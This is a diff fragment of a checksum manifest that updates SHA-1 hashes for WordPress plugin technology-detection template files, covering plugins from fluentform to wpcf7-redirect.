+http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 -http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 -http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 -http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 -http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 -http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 -http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b -http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f -http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391 -http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde -http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a -http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac -http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 -http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 -http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b -http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 -http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 -http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 -http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb -http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 -http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 -http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd -http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb -http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 -http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015 -http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf -http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 -http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 -http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af -http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9 -http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50 +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f +http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 +http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47 -http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c -http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d -http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 -http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e -http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 -http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 -http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 -http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 -http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 -http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd -http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 -http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 +http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a +http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa +http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da +http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 +http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf +http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd -http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 -http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc -http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b -http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 -http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a -http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 +http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a -http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 -http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e -http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 -http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 -http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 